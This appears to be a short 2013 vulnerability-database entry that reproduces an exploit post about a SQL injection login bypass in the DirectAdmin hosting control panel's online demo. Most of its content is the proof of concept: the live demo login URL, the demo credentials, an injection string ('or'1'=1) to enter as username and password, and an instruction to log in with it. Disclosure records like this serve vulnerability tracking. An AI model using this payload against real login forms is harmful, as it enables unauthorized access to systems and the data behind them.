DirectAdmin On-Line Demo SQL Injection

Vulnerability ID: 1045589    Vulnerability type: (not given)
Published: 2013-02-14    Updated: 2013-02-14
CVE ID: N/A    CNNVD-ID: N/A
Platform: N/A    CVSS score: N/A
Source:
https://cxsecurity.com/issue/WLB-2013020101
Details:
Vulnerability details have not yet been disclosed.
Exploit:
++++++++++++++++++++++++++++++++++++++
# Exploit Title: DirectAdmin On-Line Demo SQL Injection
# *Vendor*:http://www.directadmin.com/
# Author: Juan Carlos García
# Blog: http://hackingmadrid.blogspot.com
# Facebook https://www.facebook.com/pages/Tiger-Team/606699939344001?ref=hl


DESCRIPTION
+++++++++++
DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier.
DirectAdmin is compatible with several versions of Red Hat, Fedora Core, Red Hat Enterprise Linux, CentOS, FreeBSD, Ubuntu and Debian.

PoC
++++

https://www.directadmin.com:2222/CMD_LOGIN

user:user_demo
pass:demo

OR

user1:  'or'1'=1
pass1:  'or'1'=1


Procedure: Login using user1/pass1

++++++++++++++++++++++++
Tiger Team Security Nightsec
++++++++++++++++++++++++